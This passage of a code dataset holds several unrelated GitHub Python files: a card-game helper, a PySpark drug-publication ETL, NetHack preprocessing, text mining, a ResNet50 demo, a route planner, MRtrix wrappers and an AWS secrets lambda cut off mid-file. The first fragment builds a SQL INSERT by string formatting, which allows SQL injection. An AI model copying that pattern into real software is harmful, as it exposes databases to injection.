95 + \"\\n\")\n    name = new_name()\n    dni = new_nif(0)\n    print(\"\\n\", \"*\"*95, \"\\nName: \", name, \"\\nDNI: \", dni)\n    profile = player_profile()\n    save = save_player(name, dni, profile, 0)\n    if save:\n        query = \"INSERT INTO player VALUES ('{}','{}',{},{})\".format(dni, name, profile, 0)\n        InputBBDD(query)\n        print(\"Player saved\")\n    else:\n        return\n","repo_name":"IFurio/Proyecto1-Siete-y-medio---Geanfranco-David-Isaac","sub_path":"les_meves_funcions/funcions_generals.py","file_name":"funcions_generals.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"33868027116","text":"from pyspark.sql import DataFrame, SparkSession\n\nfrom pyspark.sql.functions import col, count, expr, lit, regexp_replace, trim, upper, when\n\nfrom src.dao import dao\nfrom src.utils import constants, utils\n\n\nclass PublicationService(object):\n    \"\"\"\n    Finds the name of one or several newspapers from the json produced by the data pipeline\n    that mention the most different drugs.\n    :param pyspark.sql session\n    :param drug inputfile path\n    :param clinical trial inputfile path\n    :param pubmed csv inputfile path\n    :param pubmed json inputfile path\n    :param output path\n    \"\"\"\n\n    def __init__(\n        self,\n        spark: SparkSession,\n        drug_path: str,\n        clinical_trial_path: str,\n        pubmed_csv_path: str,\n        pubmed_json_path: str,\n        output_path: str,\n    ):\n        self.spark = spark\n        self.drug_path = drug_path\n        self.clinical_trial_path = clinical_trial_path\n        self.pubmed_csv_path = pubmed_csv_path\n        self.pubmed_json_path = pubmed_json_path\n        self.output_path = output_path\n        self.drug_dao = dao.DrugDao(self.spark, self.drug_path)\n        self.clinical_trial_dao = dao.ClinicalTrialDao(self.spark, self.clinical_trial_path)\n        self.pubmed_dao = dao.PubmedDao(self.spark, self.pubmed_csv_path, self.pubmed_json_path)\n\n    def execute(self):\n        \"\"\"\n        - Finds the result which represents a link graph between the different drugs and their respective\n        mentions in the different PubMed publications, the scientific publications and finally the newspapers\n        with the date associated with each of these mentions.\n        - Finds the name of one or several newspapers from the json produced by the data pipeline\n        that mention the most different drugs.\n        - saves the two 
results to the output path\n        :return: the result of the execution\n        :type: str\n        \"\"\"\n        publication_df = self._find_publication_result()\n        top_journals_df = self._find_top_journals_result(publication_df)\n\n        publication_dao = dao.PublicationDao(path=self.output_path)\n        publication_dao.write(df=publication_df, destination=\"publication\")\n        publication_dao.write(df=top_journals_df, destination=\"top_journals\")\n\n        top_journals = top_journals_df.select(constants.JOURNAL).rdd.flatMap(lambda x: x).collect()\n\n        result = (\n            f\"The publication result has been saved to {self.output_path}/publication\\n\"\n            \"The journals that mention the most different drugs:\\n\"\n            f\"- {top_journals}\\n\"\n            f\"The result has been saved to {self.output_path}/top_journals\"\n        )\n        return result\n\n    def _find_publication_result(self):\n        \"\"\"\n        Finds the result which represents a link graph between the different drugs and their respective\n        mentions in the different PubMed publications, the scientific publications and finally the newspapers\n        with the date associated with each of these mentions.\n        :return: pyspark.sql.DataFrame\n        \"\"\"\n        drug_df = self._get_drug_df()\n        clinical_trial_df = self._get_clinical_trial_df()\n        pubmed_df = self._get_pubmed_df()\n\n        columns = [\n            constants.DRUG_NAME,\n            constants.JOURNAL,\n            constants.CLINICAL_TRIAL,\n            constants.PUBMED,\n            constants.CLINICAL_TRIAL_DATE,\n        ]\n\n        df1 = self._union(\n            left_df=drug_df,\n            right_df=clinical_trial_df,\n            join_left_column=constants.CLINICAL_TRIAL_SCIENTIFIC_TITLE,\n            join_right_column=constants.DRUG_NAME,\n            add_column=constants.PUBMED,\n            drop_columns=(\n                constants.DRUG_ATCCODE,\n                constants.CLINICAL_TRIAL_ID,\n            ),\n            old_columns=[\n                constants.CLINICAL_TRIAL_SCIENTIFIC_TITLE,\n                constants.CLINICAL_TRIAL_JOURNAL,\n            ],\n            new_columns=[constants.CLINICAL_TRIAL, constants.JOURNAL],\n            select_columns=columns,\n        )\n        df2 = self._union(\n            left_df=drug_df,\n            right_df=pubmed_df,\n            join_left_column=constants.PUBMED_TITLE,\n            join_right_column=constants.DRUG_NAME,\n            add_column=constants.CLINICAL_TRIAL,\n            drop_columns=(\n                constants.DRUG_ATCCODE,\n                constants.PUBMED_ID,\n            ),\n            old_columns=[\n                constants.PUBMED_TITLE,\n                constants.PUBMED_JOURNAL,\n            ],\n            new_columns=[constants.PUBMED, constants.JOURNAL],\n            select_columns=columns,\n        )\n        regex = r\"\\\\x[a-f0-9]{2}\"\n        df = (\n            df1.union(df2)\n            .withColumn(\n                constants.PUBMED,\n                when(col(constants.PUBMED).isNotNull(), lit(\"yes\")).otherwise(lit(\"no\")),\n            )\n            .withColumn(\n                constants.CLINICAL_TRIAL,\n                when(col(constants.CLINICAL_TRIAL).isNotNull(), lit(\"yes\")).otherwise(lit(\"no\")),\n            )\n            .withColumn(\n                constants.JOURNAL,\n                when(\n                    col(constants.JOURNAL).isNotNull(),\n                    trim(regexp_replace(col(constants.JOURNAL), regex, \"\")),\n                ),\n            )\n        )\n        df.show()\n        return df\n\n    def _find_top_journals_result(self, df: DataFrame):\n        \"\"\"\n        Finds the name of one or several newspapers from the json produced by the data pipeline\n        that mention the most different drugs.\n        :param: the graph which represents a link graph between the different drugs and their respective\n        mentions in the different PubMed publications, the scientific publications and finally the newspapers\n        with the date associated with each of these mentions\n        :type: pyspark.sql.DataFrame\n        :return: the result\n        :type: pyspark.sql.DataFrame\n        \"\"\"\n        rows = (\n            df.select(col(constants.DRUG_NAME), col(constants.JOURNAL))\n            .dropDuplicates([constants.DRUG_NAME, constants.JOURNAL])\n            .groupBy(col(constants.JOURNAL))\n            
.agg(count(\"*\").alias(constants.DRUGS_COUNT))\n )\n max_count = rows.agg({constants.DRUGS_COUNT: \"max\"}).collect()[0][0]\n print(max_count, type(max_count))\n\n rows = rows.filter(rows[constants.DRUGS_COUNT] == max_count)\n rows.show()\n return rows\n\n def _union(\n self,\n left_df: DataFrame,\n right_df: DataFrame,\n join_left_column: str,\n join_right_column: str,\n add_column: str,\n drop_columns: tuple,\n old_columns: list,\n new_columns: list,\n select_columns: list,\n ):\n df = (\n left_df.join(\n right_df,\n upper(right_df[join_left_column]).contains(upper(left_df[join_right_column])),\n \"left\",\n )\n .na.drop()\n .withColumn(add_column, expr(\"null\"))\n .drop(*drop_columns)\n )\n df = utils.rename_columns(\n df=df,\n old_columns=old_columns,\n new_columns=new_columns,\n )\n return df.select(select_columns)\n\n def _get_drug_df(self):\n return self.drug_dao.read()\n\n def _get_clinical_trial_df(self):\n return self.clinical_trial_dao.read()\n\n def _get_pubmed_df(self):\n return self.pubmed_dao.read()\n","repo_name":"liuflorent/drug-publication-etl","sub_path":"src/service/publication_service.py","file_name":"publication_service.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30658571916","text":"# Code for preprocessing\nimport cv2\nimport os\n\nimport numpy as np\nimport torch\n\nfrom PIL import Image, ImageFont, ImageDraw\nfrom numba import njit\n\nfrom rl_baseline.obs_wrappers import COLORS, VectorFeaturesWrapper, initialize_char_array, tile_characters_to_image\n\n\nclass GPT5BaselineTransform:\n def __init__(self, font_size=9, crop_size=12, rescale_font_size=(6, 6)):\n self.char_array = initialize_char_array(font_size, rescale_font_size)\n self.char_height = self.char_array.shape[2]\n self.char_width = self.char_array.shape[3]\n # Transpose for CHW\n self.char_array = self.char_array.transpose(0, 1, 4, 2, 3)\n\n self.crop_size = crop_size\n\n # Render only crop region\n self.half_crop_size = crop_size // 2\n self.output_height_chars = crop_size\n self.output_width_chars = crop_size\n\n self.chw_image_shape = (\n 3,\n self.output_height_chars * self.char_height,\n self.output_width_chars * self.char_width\n )\n\n def __call__(self, minibatch):\n \n # Dataset would look like this. 
BS is batch size, L is the length of a sequence\n bl_stats = minibatch['blstats'].astype(np.int32) # Size (2, L, 27) \n chars = minibatch['tty_chars'] # Size (2, L, 24, 80)\n colors = minibatch['tty_colors'] # Size (2, L, 24, 80)\n message = minibatch['message'] # Size (2, L, 256)\n\n seq_shape = bl_stats.shape[:-1]\n tty_shape = chars.shape[-2:]\n bl_stats = bl_stats.reshape((-1, bl_stats.shape[-1]))\n\n norm_bl_stats = (bl_stats * VectorFeaturesWrapper.BLSTAT_NORMALIZATION_STATS).astype(np.float32)\n np.clip(\n norm_bl_stats,\n VectorFeaturesWrapper.BLSTAT_CLIP_RANGE[0],\n VectorFeaturesWrapper.BLSTAT_CLIP_RANGE[1],\n out=norm_bl_stats\n )\n\n if self.crop_size:\n # Center around player\n center_xs = bl_stats[:, 0].astype(int)\n center_ys = bl_stats[:, 1].astype(int)\n offset_hs = center_ys - self.half_crop_size\n offset_ws = center_xs - self.half_crop_size\n\n cropped_views = np.zeros((np.prod(seq_shape), *self.chw_image_shape), dtype=np.uint8)\n for i, (char, color, offset_h, offset_w) in enumerate(zip(chars.reshape(-1, *tty_shape), colors.reshape(-1, *tty_shape), offset_hs, offset_ws)):\n \n tile_characters_to_image(\n out_image=cropped_views[i],\n chars=char,\n colors=color,\n output_height_chars=self.output_height_chars,\n output_width_chars=self.output_width_chars,\n char_array=self.char_array,\n offset_h=offset_h,\n offset_w=offset_w\n )\n cropped_views = cropped_views.reshape(seq_shape + cropped_views.shape[1:])\n norm_bl_stats = norm_bl_stats.reshape(seq_shape + norm_bl_stats.shape[1:])\n\n batch = {}\n batch[\"obs\"] = cropped_views\n batch[\"message\"] = message\n batch[\"vector_obs\"] = norm_bl_stats\n \n # Pass through all the keys that are not used in the transform\n for key, value in minibatch.items():\n if key not in ['blstats', 'message']:\n batch[key] = value\n return batch\n\n\nclass ToTensorDict(object):\n \"\"\"Convert a dict of ndarrays in a dict of Tensors.\"\"\"\n def __call__(self, sample):\n tensor_dict = {}\n for key, value in sample.items():\n if key =='idx':\n tensor_dict[key] = value\n elif np.issubdtype(value.dtype, np.number) or value.dtype == bool:\n tensor_dict[key] = torch.from_numpy(np.array(value))\n else:\n tensor_dict[key] = np.array(value)\n return tensor_dict\n\n\nclass DictAsAttributes:\n def __init__(self, data_dict):\n self.__dict__['_data_dict'] = data_dict\n\n def __getattr__(self, key):\n if key in self._data_dict:\n return self._data_dict[key]\n else:\n raise AttributeError(f\"'DictAsAttributes' object has no attribute '{key}'\")\n\n def __setattr__(self, key, value):\n self._data_dict[key] = value\n\n def __delattr__(self, key):\n del self._data_dict[key]","repo_name":"facebookresearch/motif","sub_path":"utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"67"} +{"seq_id":"37391604181","text":"#%%\nimport nltk\nimport json\nimport re\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport textwrap\n#%%\nwith open(\"../story_characters.json\", \"r\") as fp:\n data = json.load(fp)\ndata\n\n#%%\nwith open(\"../dataset/metadata.json\", \"r\") as fp:\n metadata = json.load(fp)\nmetadata\n\n# %%\ncombined_names=[]\nfor i in data.values():\n for j in i:\n combined_names.append(j)\nprint (combined_names)\n\n# %%\n\ndistinct_names = []\nfor name in combined_names:\n if name not in distinct_names:\n distinct_names.append(name)\nprint(distinct_names)\nr = re.compile(\"'Sherlock'\")\na = 
list(filter(r.match,distinct_names))\nprint(a) #none =)\n# %%\n#count the number of Holmes appearances in each story \ncounts = []\nfor v in data.values():\n    s = sum('Holmes' in name for name in v)\n    counts.append(s)\nprint(counts)\n\n# %%\nstory_collection = {}\n\nfor collection_id, collection in metadata['collections'].items():\n    for story in collection[\"stories\"].keys():\n        story_collection[story] = collection[\"title\"]\nprint(story_collection)\n# %%\n# %%\nstories = data.keys()\ndf = pd.DataFrame(stories, columns = ['Story'])\ndf[\"Counts of Holmes\"] = counts\ncollections = []\nfor story in stories:\n    collections.append(story_collection[story])\ndf[\"Collection\"] = collections\nprint(df)\n\n# %%\norder=[\"The Adventures of Sherlock Holmes\", \n\"The Memoirs of Sherlock Holmes\", \n\"The Return of Sherlock Holmes\", \n\"His Last Bow\", \n\"The Case-Book of Sherlock Holmes\"]\nplt.figure()\nsns.set_style(\"whitegrid\")\ng = sns.boxplot( x=df[\"Collection\"], y=df[\"Counts of Holmes\"], width=0.3, order = order)\ng.set_ylabel(\"Appearance of 'Holmes'\")\ng.set_xticklabels(g.get_xticklabels(),rotation=90)\ng.set_xticklabels(textwrap.fill(x.get_text(), 20) for x in g.get_xticklabels())\ng.set_title('Number of appearances of Sherlock in different collections')\nplt.tight_layout()\nplt.savefig('appearances_of_Sherlock.png')\n# %%\n","repo_name":"Mesi12/um_2021_text_mining","sub_path":"w_questions/corenlp_sent-by-sent/visualisation/appearances_of_Holmes.py","file_name":"appearances_of_Holmes.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"28238201297","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# import libraries\nfrom keras.applications.resnet50 import ResNet50, decode_predictions,preprocess_input\nfrom keras.preprocessing import image\n\nimport numpy as np\nimport requests\nfrom io import BytesIO \nfrom PIL import Image\n\n\n# In[2]:\n\n\n# download the ResNet50 model\nmodel = ResNet50(weights = 'imagenet')\n\n\n# In[3]:\n\n\n# architecture of the ResNet50 model\nmodel.summary()\n\n\n# ## Import an image from the internet\n# # displays the image in Jupyter\n# \n# \n# \n# ![] (link)\n# \n\n# ![](https://natgeo.imgix.net/syndication/d03e14b9-ccf2-40d2-9612-997a20d35b4a/magazine-rights-exempt-2016-08-departments-panda-mania-12.jpg?auto=compress,format&w=1024&h=560&fit=crop)\n\n# ![](https://www.google.com/url?sa=i&source=imgres&cd=&cad=rja&uact=8&ved=2ahUKEwiFvvuM8MLhAhWHyKQKHSxsBEoQjRx6BAgBEAU&url=https%3A%2F%2Fwww.nationalgeographic.com.au%2Fanimals%2Fwho-discovered-the-panda.aspx&psig=AOvVaw2_1mzwUKFN5triJdvHotFY&ust=1554894652416632)\n\n# In[4]:\n\n\n# import an image from the internet\nurl_img = ('https://natgeo.imgix.net/syndication/d03e14b9-ccf2-40d2-9612-997a20d35b4a/magazine-rights-exempt-2016-08-departments-panda-mania-12.jpg?auto=compress,format&w=1024&h=560&fit=crop')\n\nresponse = requests.get(url_img)\n\n# convert to Bytes\nimg = Image.open(BytesIO(response.content))\n\n# resize the image to 224x224, as the model requires\nimg = img.resize((224,224))\nimg\n\n\n# In[5]:\n\n\n# convert the image to an array with values 0-255\nX = image.img_to_array(img)\n\n# add a new dimension, because the model expects 4 dimensions\nX = np.expand_dims(X, axis =0)\n\n# (1, 224, 224, 3)\n# 1 - image\n# 224 - size\n# 224 - size\n# 3 - RGB\nX.shape\n\n\n# In[6]:\n\n\nnp.expand_dims(X, axis =0).shape\n\n\n# In[7]:\n\n\n# prediction\ny_pred = model.predict(X)\n\n\n# In[8]:\n\n\n# probability of what is in the picture\ndecode_predictions(y_pred, top = 5)\n\n\n# In[9]:\n\n\n# other examples\nurl_money =('http://3.bp.blogspot.com/-CU3Mg-LeVC4/VWSAi6Ff3dI/AAAAAAAAAkM/UnHJHUkba3c/s400/IMG_9240.JPG')\nurl_dolar =('https://s3.amazonaws.com/ngccoin-production/us-coin-explorer-category/2718362-020o.jpg')\nurl_kasa =('https://ocdn.eu/pulscms-transforms/1/MesktkpTURBXy82NDZmNjk1MTExMzVmN2Q5ZmMwMWE1YjUxODU5YzdkNC5qcGeSlQMAAM0QbM0JPZMFzQNSzQHe')\nurl_snow =('https://miastodzieci.pl/wp-content/uploads/2015/09/snowman-1073800_1920.jpg') \nurl_dolares = ('https://wf2.xcdn.pl/files/17/04/12/984916_hI4O_17123251389_bed3c3a1ba_b_83.jpg')\nurl_cash = ('http://m.wm.pl/2018/07/orig/pieniadze-22-482228.jpg')\n\nresponse = requests.get(url_cash)\nimg = Image.open(BytesIO(response.content))\n\n# resize the image to 224x224\nimg = img.resize((224,224))\nimg\n\n\n# In[10]:\n\n\nX = image.img_to_array(img)\nX = np.expand_dims(X, axis =0)\nX.shape\n\n\n# In[11]:\n\n\n# prediction\ny_pred = model.predict(X)\n\n\n# In[12]:\n\n\n# probability of what is in the picture\ndecode_predictions(y_pred, top = 5)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"toskpl/Challenge_DW","sub_path":"part2/day2/day2 - pandas image.py","file_name":"day2 - pandas image.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"71526235415","text":"from sklearn.model_selection import GridSearchCV\nimport numpy as np\nimport pandas as pd\nfrom sklearn.neural_network import MLPClassifier\ntrain = pd.read_excel('stats.xls', sheet_name='train')\ntest = pd.read_excel('stats.xls', sheet_name='test')\n\n\narray_train = train.values\narray_test = test.values\n\nX = array_train[0:, 1:11]\ny = np.asarray(train['状态'], dtype=\"|S6\")\nX_test = array_test[0:, 1:11]\n\n# Set the parameters by cross-validation\n# MLPClassifier(hidden_layer_sizes=(100,), activation='identity', solver='adam', alpha=0.01,\n#               batch_size='auto', learning_rate='adaptive', learning_rate_init=0.0001,\n#               power_t=0.5, max_iter=200000, shuffle=True, random_state=None, tol=0.0001,\n#               verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True,\n#               early_stopping=False, validation_fraction=0.2, beta_1=0.9, beta_2=0.99, epsilon=1e-08),\n\ntuned_parameters = [{'learning_rate_init': [0.001, 0.002, 0.003],\n                     'alpha': [0.01, 0.05, 0.1, 0.5],\n                     'power_t': [0.2, 0.3, 0.4, 0.5],\n                     'momentum':[0.5, 0.6, 0.7, 0.8, 0.9],\n                     'validation_fraction':[0.1, 0.2, 0.3, 0.4, 0.5]\n                     }]\n\nscores = ['precision', 'recall']\n\nfor score in scores:\n    print(\"# Tuning hyper-parameters for %s\" % score)\n    print()\n\n    clf = GridSearchCV(MLPClassifier(), tuned_parameters, cv=5,\n                       scoring='%s_macro' % score)\n    clf.fit(X, y)\n\n    print(\"Best parameters set found on development set:\")\n    print()\n    print(clf.best_params_)\n    print()\n    print(\"Grid scores on development set:\")\n    print()\n    means = clf.cv_results_['mean_test_score']\n    stds = clf.cv_results_['std_test_score']\n    for mean, std, params in zip(means, stds, clf.cv_results_['params']):\n        print(\"%0.3f (+/-%0.03f) for %r\"\n              % (mean, std * 2, params))\n    print()\n\n    print(\"Detailed classification report:\")\n    print()\n    print(\"The model is trained on the full development set.\")\n    print(\"The scores are computed on the full evaluation set.\")\n    print()\n\n","repo_name":"dilmuratjohn/python","sub_path":"programs/graduation-project/optimize for Neural Net.py","file_name":"optimize for Neural 
Net.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"}
+{"seq_id":"7461246621","text":"import random\n\nclass RoutePlanner(object):\n    \"\"\"Silly route planner that is meant for a perpendicular grid network.\"\"\"\n\n    def __init__(self, env, agent):\n        self.env = env\n        self.agent = agent\n        self.destination = None\n\n    def route_to(self, destination=None):\n        self.destination = destination if destination is not None else random.choice(self.env.intersections.keys())\n        #print \"RoutePlanner.route_to(): destination = {}\".format(destination)  # [debug]\n\n    def get_delta(self):\n        \"\"\"\n        Get the horizontal and vertical distance\n        between location and destination.\n        \"\"\"\n        location = self.env.agent_states[self.agent]['location']\n        grid_size = self.env.grid_size\n        heading = self.env.agent_states[self.agent]['heading']\n        delta = [0, 0]\n        for i in range(2):\n            # 1st option: destination to the east/south of location\n            if self.destination[i] > location[i]:\n                # two possible distances, going east/south or\n                # going west/north\n                possible_delta = [self.destination[i] - location[i], \n                                  location[i] + grid_size[i] - self.destination[i]]\n                # if both are the same, check the heading\n                if possible_delta[0] == possible_delta[1]:\n                    # if agent is turned toward this axis,\n                    # pick direction it is turned to\n                    if heading[i]:\n                        delta[i] = possible_delta[0] * heading[i]\n                    # if it isn't, pick the distance to the right\n                    # (it's easier to turn right than left)\n                    elif i: # north/south axis: negate heading to go right\n                        delta[i] = possible_delta[0] * -sum(heading)\n                    else: # west/east axis: right is same sign as heading\n                        delta[i] = possible_delta[0] * sum(heading)\n                # if the first distance is the smallest, pick it\n                elif min(possible_delta) == possible_delta[0]:\n                    delta[i] = possible_delta[0]\n                # if second distance is the smallest, pick minus it\n                # (the agent will have to go west/north to get to a point\n                # to the east/south)\n                else:\n                    delta[i] = -possible_delta[1]\n            # 2nd option: destination to the west/north of location\n            else:\n                # two possible distances, going west/north or\n                # going east/south\n                possible_delta = [location[i]-self.destination[i], self.destination[i] + grid_size[i] - location[i]]\n                # if both are the same, check the heading \n                if possible_delta[0] == possible_delta[1]:\n                    # if agent is turned toward this axis,\n                    # pick direction it is turned to\n                    if heading[i]:\n                        delta[i] = abs(possible_delta[0]) * heading[i]\n                    # if it isn't, pick the distance to the right\n                    # (it's easier to turn right than left)\n                    elif i: # north/south axis: negate heading to go right\n                        delta[i] = possible_delta[0] * -sum(heading)\n                    else: # west/east axis: right is same sign as heading\n                        delta[i] = possible_delta[0] * sum(heading)\n                # if the first distance is the smallest, pick minus it\n                # (the agent will have to go west/north)\n                elif min(possible_delta) == possible_delta[0]:\n                    delta[i] = -possible_delta[0]\n                # if second distance is smallest, pick it\n                else:\n                    delta[i] = possible_delta[1]\n        # return a tuple\n        return tuple(delta)\n\n    def next_waypoint(self):\n        \"\"\"\n        Calculate the next waypoint.\n        \"\"\"\n        # get delta from destination\n        self.delta = self.get_delta()\n        delta = self.delta\n\n        # get agent heading \n        heading = self.env.agent_states[self.agent]['heading']\n        \n        # if agent is turned to the east/west axis\n        if heading[0]:\n            # if it needs to go forward, do it\n            if delta[0] * heading[0] > 0:\n                return 'forward'\n            # else check if it needs 
to go backward\n elif delta[0] * heading[0] < 0:\n if delta[1] * heading[0] > 0:\n return 'right'\n else:\n return 'left'\n elif delta[1] * heading[0] > 0:\n return 'right'\n else:\n return 'left'\n else:\n if delta[1] * heading[1] > 0:\n return 'forward'\n elif delta[1] * heading[1] < 0:\n if delta[0] * heading[1] < 0:\n return 'right'\n else:\n return 'left'\n elif delta[0] * heading[1] < 0:\n return 'right'\n else:\n return 'left'\n","repo_name":"lmurtinho/mlend_ps4_smartcab","sub_path":"smartcab/perfect_planner.py","file_name":"perfect_planner.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"1409922157","text":"import subprocess\nimport os\nimport re\n\n\ndef option_dict_to_list(options: dict, reverse: bool):\n options_list = []\n for i_key, i_value in options.items():\n if type(i_value) is str:\n if reverse:\n options_list.extend([str(i_value), \"-\" + str(i_key)])\n else:\n options_list.extend([\"-\" + str(i_key), str(i_value)])\n elif type(i_value) is list:\n options_list.append(\"-\" + str(i_key))\n for i_i_value in i_value:\n options_list.append(i_i_value)\n elif type(i_value) is tuple:\n for i_i_value in i_value:\n # print(i_i_value.split(\" \"))\n temp = [\"-\" + str(i_key)]\n temp.extend(i_i_value.split(\" \"))\n options_list.extend(temp)\n elif i_value is None:\n options_list.append(\"-\" + str(i_key))\n return options_list\n\n\ndef add_options_to_command(command, options, reverse=False):\n if options is not None:\n command.extend(option_dict_to_list(options, reverse))\n return command\n else:\n return command\n\n\ndef parse_mrtrix_output(mrtrix_output):\n stderr_message = mrtrix_output.stderr.decode(\"utf-8\")\n print(stderr_message)\n\n warning_message = re.search(\"\\[WARNING\\](.*\\n)\", stderr_message)\n n_warning_messages = len(warning_message.groups()) if warning_message is not None else 0\n out_warning_messages = []\n if n_warning_messages > 0:\n for i_group_warning_message in range(n_warning_messages):\n out_warning_messages.append(warning_message.groups(i_group_warning_message)[0].strip())\n\n error_message = re.search(\"\\[ERROR\\](.*\\n)\", stderr_message)\n n_error_messages = len(error_message.groups()) if error_message is not None else 0\n out_error_messages = []\n if n_error_messages > 0:\n for i_group_error_message in range(n_error_messages):\n i_error_message = error_message.groups(i_group_error_message)[0].strip()\n # print(\"Error: \" + i_error_message)\n\n\ndef mrconvert(in_file: str, out_file: str, options: dict = None):\n command = [\"mrconvert\"]\n command.append(in_file)\n add_options_to_command(command, options)\n command.append(out_file)\n print(command)\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef mrcat(in_files: list, out_file: str):\n\n command = [\"mrcat\"]\n command.extend(in_files)\n\n command.append(out_file)\n\n # print(command)\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef mrinfo(in_file: str, options: dict):\n command = [\"mrinfo\"]\n command.append(in_file)\n add_options_to_command(command, options)\n\n # command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef dwi2adc(in_file: str, out_file: str, options: dict):\n command = [\"dwi2adc\"]\n command.append(in_file)\n\n add_options_to_command(command, options)\n\n command.append(out_file)\n\n output = 
subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef mrcalc(in_file: str, out_file: str, options: dict):\n command = [\"mrcalc\"]\n command.append(in_file)\n\n add_options_to_command(command, options, reverse=True)\n\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef dwishellmath(in_file: str, out_file: str, operation: str):\n command = [\"dwishellmath\"]\n command.append(in_file)\n command.append(operation)\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef mrmath(in_file: str, out_file: str, operation: str, options: dict):\n command = [\"mrmath\"]\n command.append(in_file)\n command.append(operation)\n add_options_to_command(command, options)\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef dwi2tensor(in_file: str, out_file: str, options: dict):\n command = [\"dwi2tensor\"]\n command.append(in_file)\n\n add_options_to_command(command, options)\n\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef tensor2metric(in_file: str, options: dict):\n command = [\"tensor2metric\"]\n command.append(in_file)\n\n add_options_to_command(command, options)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n\n\ndef dwiextract(in_file: str, out_file: str, options: dict):\n command = [\"dwiextract\"]\n command.append(in_file)\n\n add_options_to_command(command, options)\n command.append(out_file)\n\n output = subprocess.run(command, capture_output=True)\n\n parse_mrtrix_output(output)\n","repo_name":"Svdvoort/dwipy","sub_path":"dwipy/mrtrixpy.py","file_name":"mrtrixpy.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23374928923","text":"from collections import deque\n\n\ndef parse_file(input):\n with open(input) as file:\n for line in file:\n yield \"\".join(line.split()) # remove all whitespace\n\n\ndef solve(chars):\n \"\"\"1+(2*3)+(4*(5+6))\"\"\"\n result = 0\n multiplier = 1\n\n while chars:\n char = chars.popleft()\n\n if char.isdigit():\n result += multiplier * int(char)\n elif char == '*':\n multiplier = result\n result = 0\n elif char == '(':\n result += multiplier * solve(chars)\n elif char == ')':\n break\n\n return result\n\n\ndef main(expressions):\n return sum([solve(deque(expr)) for expr in expressions])\n\n\nTEST_INPUT = [('1 + 2 * 3 + 4 * 5 + 6', 231),\n ('1 + (2 * 3) + (4 * (5 + 6))', 51),\n ('2 * 3 + (4 * 5)', 46),\n ('5 + (8 * 3 + 9 + 3 * 4 * 3)', 1445),\n ('5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))', 669060),\n ('((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2', 23340)\n ]\n\n\ndef test(test_input):\n test_results = []\n for (puzzle_input, expected) in test_input:\n solution = solve(deque(\"\".join(puzzle_input.split())))\n test_results.append((puzzle_input, solution, expected))\n for puzzle_input, solution, expected in test_results:\n\n print(puzzle_input,\n 'solution:', solution,\n 'expected:', expected,\n ('failed', expected - solution) if solution != expected else '')\n\n\ntest(TEST_INPUT)\n\n\nhomework_sum = main(parse_file(\"18-01-input.txt\"))\nprint(\"solution:\", 
homework_sum)\n","repo_name":"punkrockpolly/aoc","sub_path":"2020/18-02-OperationOrder.py","file_name":"18-02-OperationOrder.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42395181720","text":"import json\nimport boto3 \nimport requests\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport base64\nfrom botocore.exceptions import ClientError\n\n\ndef extract_texts(html_file):\n soup = BeautifulSoup(html_file, features=\"html.parser\")\n texts = soup.find_all(text=True)\n return texts\n\ndef get_secret():\n\n secret_name = \"opensearch_credentials\"\n region_name = \"us-east-1\"\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(\n service_name='secretsmanager',\n region_name=region_name\n )\n\n # In this sample we only handle the specific exceptions for the 'GetSecretValue' API.\n # See https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n # We rethrow the exception by default.\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'DecryptionFailureException':\n # Secrets Manager can't decrypt the protected secret text using the provided KMS key.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InternalServiceErrorException':\n # An error occurred on the server side.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidParameterException':\n # You provided an invalid value for a parameter.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 